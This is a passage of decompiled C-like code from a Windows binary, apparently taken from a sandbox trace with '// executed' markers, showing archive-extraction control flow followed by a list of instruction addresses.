															_t406 =  *(_t689 + 8);
															__eflags =  *((char*)(_t406 + 0x6157));
															_t109 = _t708 - 0xd;
															 *_t109 =  *(_t708 - 0xd) & (_t406 & 0xffffff00 |  *((char*)(_t406 + 0x6157)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t708 - 0x113c; // -2364
															_t410 = E00067D6C(_t111, _t578, _t111);
															__eflags = _t410;
															if(_t410 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t708 - 0x113c; // -2364
																	_t544 = E00068236(_t689, _t578);
																	__eflags = _t544;
																	if(_t544 == 0) {
																		 *((char*)(_t689 + 0x20f8)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t708 - 0x13c; // 0x6c4
																	_t702 =  *(_t689 + 8) + 0x5024;
																	_t597 = 0x40;
																	memcpy(_t118,  *(_t689 + 8) + 0x5024, _t597 << 2);
																	_t712 = _t710 + 0xc;
																	asm("movsw");
																	_t121 = _t708 - 0x28; // 0x7d8
																	_t689 =  *((intOrPtr*)(_t708 - 0x20));
																	 *(_t708 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t708 - 0x13c; // 0x6c4
																	E0006C991(_t689 + 0x10, 0,  *((intOrPtr*)(_t578 + 0x331c)), _t128,  ~( *(_t578 + 0x3320) & 0x000000ff) & _t578 + 0x00003321, _t578 + 0x3331,  *((intOrPtr*)(_t578 + 0x336c)), _t578 + 0x334b, _t121);
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		L73:
																		 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																		_t147 = _t708 - 0x13c; // 0x6c4
																		L0006EAB4(_t147);
																		_t148 = _t708 - 0x2164; // -6500
																		E00069619(_t148);
																		_t420 =  *(_t578 + 0x3380);
																		 *(_t708 - 4) = 1;
																		 *(_t708 - 0x2c) = _t420;
																		_t676 = 0x50;
																		__eflags = _t420;
																		if(_t420 == 0) {
																			L83:
																			_t421 = E0006215B(_t578);
																			__eflags = _t421;
																			if(_t421 == 0) {
																				_t606 =  *(_t708 - 0xd);
																				__eflags = _t606;
																				if(_t606 == 0) {
																					_t702 =  *(_t708 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t578 + 0x6cb4));
																					if( *((char*)(_t578 + 0x6cb4)) == 0) {
																						__eflags = _t606;
																						if(_t606 == 0) {
																							L212:
																							 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																							_t359 = _t708 - 0x2164; // -6500
																							E00069653(_t359, _t702);
																							__eflags =  *(_t708 - 0x12);
																							_t387 =  *(_t708 - 0xd);
																							_t677 =  *(_t708 - 0xe);
																							if( *(_t708 - 0x12) != 0) {
																								_t363 = _t689 + 0xec;
																								 *_t363 =  *(_t689 + 0xec) + 1;
																								__eflags =  *_t363;
																							}
																							L214:
																							__eflags =  *((char*)(_t689 + 0x60));
																							if( *((char*)(_t689 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t387;
																							if(_t387 != 0) {
																								L15:
																								_t395 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t578 + 0x6cb4)) - _t387;
																							if( *((intOrPtr*)(_t578 + 0x6cb4)) != _t387) {
																								__eflags = _t677;
																								if(_t677 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00061EDA(_t578);
																							goto L15;
																						}
																						L101:
																						_t424 =  *(_t689 + 8);
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) == 0) {
																							L103:
																							_t425 =  *(_t708 - 0xe);
																							__eflags = _t425;
																							if(_t425 != 0) {
																								L108:
																								 *((char*)(_t708 - 0x11)) = 1;
																								__eflags = _t425;
																								if(_t425 != 0) {
																									L110:
																									 *((intOrPtr*)(_t689 + 0xe8)) =  *((intOrPtr*)(_t689 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t689 + 0x80)) = 0;
																									 *((intOrPtr*)(_t689 + 0x84)) = 0;
																									 *((intOrPtr*)(_t689 + 0x88)) = 0;
																									 *((intOrPtr*)(_t689 + 0x8c)) = 0;
																									E0006AA88(_t689 + 0xc8, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0)));
																									E0006AA88(_t689 + 0xa0, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0)));
																									_t702 = _t689 + 0x10;
																									 *(_t689 + 0x30) =  *(_t578 + 0x32d8);
																									_t218 = _t708 - 0x2164; // -6500
																									 *(_t689 + 0x34) =  *(_t578 + 0x32dc);
																									E0006C9D9(_t702, _t578, _t218);
																									_t678 =  *((intOrPtr*)(_t708 - 0x11));
																									_t613 = 0;
																									_t434 =  *(_t708 - 0xe);
																									 *((char*)(_t689 + 0x39)) = _t678;
																									 *((char*)(_t689 + 0x3a)) = _t434;
																									 *(_t708 - 0x24) = 0;
																									 *(_t708 - 0x1c) = 0;
																									__eflags = _t678;
																									if(_t678 != 0) {
																										L127:
																										_t679 =  *(_t689 + 8);
																										__eflags =  *((char*)(_t679 + 0x61a0));
																										 *((char*)(_t708 - 0x214b)) =  *((char*)(_t679 + 0x61a0)) == 0;
																										__eflags =  *((char*)(_t708 - 0x11));
																										if( *((char*)(_t708 - 0x11)) != 0) {
																											L131:
																											_t436 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t708 - 0x2c);
																											 *((char*)(_t708 - 0x10)) = _t613;
																											 *((char*)(_t708 - 0x14)) = _t436;
																											 *((char*)(_t708 - 0xf)) = _t436;
																											if( *(_t708 - 0x2c) == 0) {
																												__eflags =  *(_t578 + 0x3318);
																												if( *(_t578 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t578 + 0x22a0));
																													if(__eflags != 0) {
																														E00072C42(_t578,  *((intOrPtr*)(_t689 + 0xe0)), _t708,  *((intOrPtr*)(_t578 + 0x3374)),  *(_t578 + 0x3370) & 0x000000ff);
																														_t475 =  *((intOrPtr*)(_t689 + 0xe0));
																														 *(_t475 + 0x4c48) =  *(_t578 + 0x32e0);
																														__eflags = 0;
																														 *(_t475 + 0x4c4c) =  *(_t578 + 0x32e4);
																														 *((char*)(_t475 + 0x4c60)) = 0;
																														E000728F1( *((intOrPtr*)(_t689 + 0xe0)),  *((intOrPtr*)(_t578 + 0x229c)),  *(_t578 + 0x3370) & 0x000000ff);
																													} else {
																														_push( *(_t578 + 0x32e4));
																														_push( *(_t578 + 0x32e0));
																														_push(_t702); // executed
																														E000692E6(_t578, _t679, _t689, __eflags); // executed
																													}
																												}
																												L163:
																												E00061EDA(_t578);
																												__eflags =  *((char*)(_t578 + 0x3319));
																												if( *((char*)(_t578 + 0x3319)) != 0) {
																													L166:
																													_t438 = 0;
																													__eflags = 0;
																													_t615 = 0;
																													L167:
																													__eflags =  *(_t578 + 0x3370);
																													if( *(_t578 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t578 + 0x22a0));
																														if( *((char*)(_t578 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t708 - 0xe);
																															 *((char*)(_t708 - 0x10)) = _t438;
																															if( *(_t708 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t708 - 0x2c);
																																_t680 =  *((intOrPtr*)(_t708 - 0xf));
																																if( *(_t708 - 0x2c) == 0) {
																																	L189:
																																	_t616 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t708 - 0x11));
																																	if( *((char*)(_t708 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t702 =  *(_t708 - 0x18);
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x30));
																																	if(_t702 ==  *((intOrPtr*)(_t708 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t708 - 0x2c);
																																		if( *(_t708 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				L200:
																																				__eflags = _t616;
																																				if(_t616 != 0) {
																																					L208:
																																					_t439 =  *(_t689 + 8);
																																					__eflags =  *((char*)(_t439 + 0x61a8));
																																					if( *((char*)(_t439 + 0x61a8)) == 0) {
																																						_t702 = _t689 + 0x10f8;
																																						_t440 = E0006A444(_t689 + 0x10f8,  *((intOrPtr*)(_t578 + 0x22a4))); // executed
																																						__eflags = _t440;
																																						if(__eflags == 0) {
																																							E0007F190(E00061F94(__eflags, 0x11, _t578 + 0x24, _t702));
																																						}
																																					}
																																					 *(_t689 + 0x10f7) = 1;
																																					goto L212;
																																				}
																																				_t681 =  *(_t708 - 0x1c);
																																				__eflags = _t681;
																																				_t619 =  *(_t708 - 0x24);
																																				if(_t681 > 0) {
																																					L203:
																																					__eflags = _t438;
																																					if(_t438 != 0) {
																																						L206:
																																						_t332 = _t708 - 0x2164; // -6500
																																						E00069EBF(_t332);
																																						L207:
																																						_t702 = _t578 + 0x32d0;
																																						_t694 = _t578 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t340 = _t708 - 0x2164; // -6500
																																						E00069D62(_t340, _t578 + 0x32d0,  ~( *( *(_t689 + 8) + 0x72d0)) & _t694,  ~( *( *(_t689 + 8) + 0x72d4)) & _t578 + 0x000032c8,  ~( *( *(_t689 + 8) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t341 = _t708 - 0x2164; // -6500
																																						E000696D0(_t341);
																																						E00067BD1( *((intOrPtr*)(_t708 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)), _t578,  *((intOrPtr*)(_t708 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694;
																																						E00069D5F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t689 =  *((intOrPtr*)(_t708 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x88)) - _t619;
																																					if( *((intOrPtr*)(_t689 + 0x88)) != _t619) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x8c)) - _t681;
																																					if( *((intOrPtr*)(_t689 + 0x8c)) == _t681) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t619;
																																				if(_t619 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t463 =  *(_t689 + 8);
																																			__eflags =  *((char*)(_t463 + 0x61a0));
																																			if( *((char*)(_t463 + 0x61a0)) == 0) {
																																				goto L212;
																																			}
																																			_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t616;
																																		if(_t616 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t578 + 0x3380) - 5;
																																		if( *(_t578 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t680;
																																		if(_t680 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x34));
																																	if(_t702 !=  *((intOrPtr*)(_t708 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t578 + 0x3380) - 4;
																																if( *(_t578 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t680;
																																if(_t680 == 0) {
																																	goto L189;
																																}
																																_t616 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t708 - 0x14));
																															if( *((char*)(_t708 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t615;
																															if(_t615 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x331b)) - _t615;
																															if(__eflags == 0) {
																																L183:
																																_t312 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(3);
																																L184:
																																E00061F94(__eflags);
																																 *((char*)(_t708 - 0x10)) = 1;
																																E00066FC6(0xa0f50, 3);
																																_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x3341)) - _t615;
																															if( *((intOrPtr*)(_t578 + 0x3341)) == _t615) {
																																L181:
																																__eflags =  *((char*)(_t689 + 0xf4));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t310 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t578 + 0x6cc4) - _t615;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t578 + 0x32e4) - _t438;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t615;
																															if(_t615 != 0) {
																																 *((char*)(_t689 + 0xf4)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t578 + 0x32e0) - _t438;
																														if( *(_t578 + 0x32e0) <= _t438) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t689 + 0xf4)) = _t438;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t472 = E0006AA56(_t689 + 0xc8, _t689, _t578 + 0x32f0,  ~( *(_t578 + 0x334a) & 0x000000ff) & _t578 + 0x0000334b);
																												__eflags = _t472;
																												if(_t472 == 0) {
																													goto L166;
																												}
																												_t615 = 1;
																												_t438 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t578 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t708 - 0x41ac; // -14764
																												E0006826A(__eflags, _t578, _t578 + 0x3384, _t263);
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												__eflags = _t613;
																												if(_t613 == 0) {
																													L153:
																													_t482 =  *((intOrPtr*)(_t708 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t578 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t578 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t613;
																														if(_t613 == 0) {
																															L157:
																															_t483 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t689 + 0x10f7) = _t483;
																															goto L163;
																														}
																														L142:
																														__eflags = _t482;
																														if(_t482 == 0) {
																															goto L157;
																														}
																														_t483 = 1;
																														goto L158;
																													}
																													__eflags = _t613;
																													if(_t613 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t708 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t708 - 0x41ac));
																												if( *((short*)(_t708 - 0x41ac)) == 0) {
																													goto L153;
																												}
																												_t267 = _t708 - 0x41ac; // -14764
																												_push(0x800);
																												_push(_t689 + 0x10f8);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t578 + 0x24);
																													_t270 = _t708 - 0x2164; // -6500
																													_t482 = E00069224(_t679, _t689, _t702, __eflags);
																												} else {
																													_t482 = E00067698(_t613, __eflags);
																												}
																												L151:
																												 *((char*)(_t708 - 0xf)) = _t482;
																												__eflags = _t482;
																												if(_t482 == 0) {
																													L139:
																													_t613 =  *((intOrPtr*)(_t708 - 0x10));
																													goto L140;
																												}
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t436;
																											if(_t702 == _t436) {
																												L144:
																												__eflags = _t613;
																												if(_t613 == 0) {
																													goto L153;
																												}
																												_push(_t689 + 0x10f8);
																												_t482 = E00067907(_t679, _t689 + 0x10, _t578);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00061F94(__eflags, 0x47, _t578 + 0x24, _t689 + 0x10f8);
																											__eflags = 0;
																											_t482 = 0;
																											 *((char*)(_t708 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t434;
																										if(_t434 != 0) {
																											goto L131;
																										}
																										_t494 = 0x50;
																										__eflags =  *(_t708 - 0x18) - _t494;
																										if( *(_t708 - 0x18) == _t494) {
																											goto L131;
																										}
																										_t436 = 1;
																										_t613 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t578 + 0x6cc4);
																									if( *(_t578 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t704 =  *(_t578 + 0x32e4);
																									_t687 =  *(_t578 + 0x32e0);
																									__eflags = _t704;
																									if(__eflags < 0) {
																										L126:
																										_t702 = _t689 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t637 =  *(_t578 + 0x32d8);
																										_t638 = _t637 << 0xa;
																										__eflags = ( *(_t578 + 0x32dc) << 0x00000020 | _t637) << 0xa - _t704;
																										if(__eflags < 0) {
																											L125:
																											_t434 =  *(_t708 - 0xe);
																											_t613 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t704;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t708 - 0x2164; // -6500
																												E00069B21(_t238,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																												 *(_t708 - 0x24) =  *(_t578 + 0x32e0);
																												 *(_t708 - 0x1c) =  *(_t578 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t502 = E000698E5(_t687);
																												__eflags = _t687 -  *(_t578 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t502 -  *(_t578 + 0x32d8);
																												if(_t502 <=  *(_t578 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t687 - 0x5f5e100;
																											if(_t687 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t638 - _t687;
																										if(_t638 <= _t687) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t687 - 0xf4240;
																									if(_t687 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t689 + 0xe4;
																								 *_t199 =  *(_t689 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t708 - 0x11)) = 0;
																							_t504 = 0x50;
																							__eflags = _t702 - _t504;
																							if(_t702 != _t504) {
																								_t193 = _t708 - 0x2164; // -6500
																								__eflags = E00069989(_t193);
																								if(__eflags != 0) {
																									E00061F94(__eflags, 0x3b, _t578 + 0x24, _t689 + 0x10f8);
																									E00067061(0xa0f50, _t708, _t578 + 0x24, _t689 + 0x10f8);
																								}
																							}
																							goto L109;
																						}
																						 *(_t689 + 0x10f7) = 1;
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) != 0) {
																							_t425 =  *(_t708 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t708 - 0xe) = 1;
																					 *(_t708 - 0xd) = 1;
																					_t183 = _t708 - 0x113c; // -2364
																					_t514 = L00071375(_t606, _t183, 0, 0, 1);
																					__eflags = _t514;
																					if(_t514 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t708 - 0x1c) = 0;
																					L99:
																					_t185 = _t708 - 0x2164; // -6500
																					E00069653(_t185, _t702);
																					_t395 =  *(_t708 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t708 - 0x2164; // -6500
																				_push(_t578);
																				_t518 = E000680EA(_t689);
																				_t702 =  *(_t708 - 0x18);
																				_t606 = _t518;
																				 *(_t708 - 0xd) = _t606;
																				L93:
																				__eflags = _t606;
																				if(_t606 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t708 - 0xd);
																			if( *(_t708 - 0xd) != 0) {
																				_t519 =  *(_t708 - 0x18);
																				__eflags = _t519 - 0x50;
																				if(_t519 != 0x50) {
																					_t645 = 0x49;
																					__eflags = _t519 - _t645;
																					if(_t519 != _t645) {
																						_t646 = 0x45;
																						__eflags = _t519 - _t646;
																						if(_t519 != _t646) {
																							_t520 =  *(_t689 + 8);
																							__eflags =  *((intOrPtr*)(_t520 + 0x615c)) - 1;
																							if( *((intOrPtr*)(_t520 + 0x615c)) != 1) {
																								 *(_t689 + 0xe4) =  *(_t689 + 0xe4) + 1;
																								_t173 = _t708 - 0x113c; // -2364
																								_push(_t578);
																								E00067F26(_t689);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t420 - 5;
																		if(_t420 == 5) {
																			goto L83;
																		}
																		_t606 =  *(_t708 - 0xd);
																		_t702 =  *(_t708 - 0x18);
																		__eflags = _t606;
																		if(_t606 == 0) {
																			goto L96;
																		}
																		__eflags = _t702 - _t676;
																		if(_t702 == _t676) {
																			goto L93;
																		}
																		_t523 =  *(_t689 + 8);
																		__eflags =  *((char*)(_t523 + 0x6201));
																		if( *((char*)(_t523 + 0x6201)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t708 - 0x11)) = 0;
																		_t526 = E0006A180(_t689 + 0x10f8);
																		__eflags = _t526;
																		if(_t526 == 0) {
																			L81:
																			__eflags =  *((char*)(_t708 - 0x11));
																			if( *((char*)(_t708 - 0x11)) == 0) {
																				_t606 =  *(_t708 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t606 = 0;
																			 *(_t708 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t708 - 0x11));
																		if( *((char*)(_t708 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t578 + 0x32c0);
																		_t161 = _t708 - 0x11; // 0x7ef
																		E00069377(0,  *(_t689 + 8), 0, _t689 + 0x10f8, 0x800, _t161,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t578 + 0x3341));
																	if( *((char*)(_t578 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t708 - 0x28; // 0x7d8
																	_t534 = E0007FDFA(_t578 + 0x3342, _t133, 8);
																	_t710 = _t712 + 0xc;
																	__eflags = _t534;
																	if(_t534 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t578 + 0x6cc4);
																	if( *(_t578 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t689 + 0x10f6));
																	_t137 = _t708 - 0x113c; // -2364
																	_push(_t578 + 0x24);
																	if(__eflags != 0) {
																		_push(6);
																		E00061F94(__eflags);
																		E00066FC6(0xa0f50, 0xb);
																		__eflags = 0;
																		 *(_t708 - 0xd) = 0;
																		goto L73;
																	}
																	_push(0x80);
																	E00061F94(__eflags);
																	E0006EB27( *(_t689 + 8) + 0x5024);
																	 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																	_t142 = _t708 - 0x13c; // 0x6c4
																	L0006EAB4(_t142);
																}
															}
															E00066FC6(0xa0f50, 2);
															_t546 = E00061EDA(_t578);
															__eflags =  *((char*)(_t578 + 0x6cb4));
															_t395 = _t546 & 0xffffff00 |  *((char*)(_t578 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t708 - 0x219c; // -6556
														_t548 = E00067D45(_t101, _t578 + 0x32c0);
														__eflags = _t548;
														if(_t548 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t708 - 0x21a0));
														if( *((char*)(_t708 - 0x21a0)) == 0) {
															L59:
															 *(_t708 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t708 - 0x219c; // -6556
														_t550 = E00067D27(_t103, _t689);
														__eflags = _t550;
														if(_t550 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t699 - _t674;
													if(_t699 != _t674) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t400 + 0x6158));
												if( *((char*)(_t400 + 0x6158)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t689 + 0x10f8);
											if( *(_t689 + 0x10f8) == 0) {
												goto L50;
											}
											 *(_t708 - 0xd) = 1;
											__eflags =  *(_t578 + 0x3318);
											if( *(_t578 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t699 - _t389;
										_t390 = 1;
										if(_t699 != _t389) {
											goto L46;
										}
										goto L45;
									}
									_t677 =  *((intOrPtr*)(_t578 + 0x6cb4));
									 *(_t708 - 0xe) = _t677;
									 *(_t708 - 0x24) = _t677;
									__eflags = _t677;
									if(_t677 == 0) {
										goto L214;
									} else {
										_t673 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t689 + 0xec) -  *((intOrPtr*)(_t581 + 0xa334));
								if( *(_t689 + 0xec) <  *((intOrPtr*)(_t581 + 0xa334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t689 + 0xf1));
								if( *((char*)(_t689 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t578 + 0x32e0) = _t672;
								 *(_t578 + 0x32e4) = _t672;
								goto L26;
							}
							__eflags =  *(_t578 + 0x32e0) - _t672;
							if( *(_t578 + 0x32e0) >= _t672) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t578 + 0x32d8) = _t672;
							 *(_t578 + 0x32dc) = _t672;
							goto L22;
						}
						__eflags =  *(_t578 + 0x32d8) - _t672;
						if( *(_t578 + 0x32d8) >= _t672) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t696 - 3;
					if(_t696 != 3) {
						L10:
						__eflags = _t696 - 5;
						if(_t696 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t578 + 0x45ac));
						if( *((char*)(_t578 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t708 - 0x18));
						_push(0);
						_push(_t689 + 0x10);
						_push(_t578);
						_t567 = E000784BD(_t672);
						__eflags = _t567;
						if(_t567 != 0) {
							__eflags = 0;
							 *0x93260( *((intOrPtr*)(_t578 + 0x6ca0)),  *((intOrPtr*)(_t578 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t578 + 0x10))))();
							goto L15;
						} else {
							E00066FC6(0xa0f50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t689 + 0x10f7);
					if( *(_t689 + 0x10f7) == 0) {
						goto L217;
					} else {
						E00067B66(_t578, _t708,  *(_t689 + 8), _t578, _t689 + 0x10f8);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t689 + 0x5f)) == 0) {
					L4:
					_t395 = 0;
					goto L17;
				}
				_push(_t371);
				_push(0);
				_push(_t689 + 0x10);
				_push(_t578);
				if(E000784BD(0) != 0) {
					_t672 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00066FC6(0xa0f50, 1);
					goto L4;
				}
			}

0x0006857b
0x00068580
0x0006858a
0x00068590
0x00068593
0x00068596
0x00068598
0x0006859e
0x000685a5
0x000685ab
0x000685d7
0x000685d8
0x000685de
0x000685e1
0x0006867a
0x00068680
0x00068686
0x0006869e
0x0006869e
0x000686a4
0x000686bc
0x000686bc
0x000686bf
0x000686c5
0x000686e2
0x000686e7
0x000686eb
0x000686f5
0x00068700
0x00068705
0x00068707
0x0006870a
0x0006870d
0x0006870f
0x00068711
0x00068715
0x00068717
0x00068719
0x00068719
0x00068715
0x00068721
0x00068726
0x00068727
0x00068734
0x00068735
0x0006873d
0x00068744
0x00068747
0x0006879e
0x000687a3
0x000687a5
0x000687a7
0x000687ad
0x000687b3
0x000687b7
0x000687b7
0x000687b7
0x000687b7
0x00068749
0x0006874c
0x00068752
0x00068754
0x00068756
0x0006875a
0x0006875c
0x00068763
0x00068768
0x00068769
0x00068770
0x00068775
0x0006877f
0x00068781
0x00068797
0x00068783
0x00068785
0x0006878c
0x0006878e
0x0006878e
0x00068781
0x0006875a
0x00068754
0x000687c0
0x000687c5
0x000687dd
0x000687e8
0x000687f0
0x000687f3
0x000687f5
0x000687f9
0x000687fc
0x000687ff
0x00068802
0x0006881a
0x0006881d
0x00068822
0x00068828
0x00068829
0x0006882b
0x00068834
0x00068834
0x00068836
0x00068839
0x00068843
0x0006884a
0x0006884f
0x00068851
0x0006921d
0x0006921d
0x00068667
0x00068668
0x0006866d
0x00068677
0x00068677
0x00068857
0x00068865
0x00068868
0x00068870
0x00068877
0x0006887a
0x00068891
0x00068891
0x00068894
0x00068894
0x00068899
0x0006889c
0x000688a3
0x000688a4
0x000688a7
0x000688aa
0x000688b5
0x000688b5
0x000688b8
0x000688bf
0x000688bf
0x000688c5
0x000688cc
0x000688cd
0x000688db
0x000688e0
0x000688e2
0x0006891a
0x0006891d
0x00068929
0x00068929
0x00068929
0x0006892c
0x0006892c
0x00068936
0x0006893b
0x0006893d
0x00068961
0x00068961
0x00068968
0x00000000
0x00000000
0x0006896a
0x00068974
0x00068979
0x0006897b
0x00068a5d
0x00000000
0x00068a5d
0x00068981
0x00068984
0x0006898c
0x00068992
0x00068993
0x00068993
0x00068995
0x0006899e
0x000689a1
0x000689ad
0x000689c0
0x000689ca
0x000689dc
0x000689e1
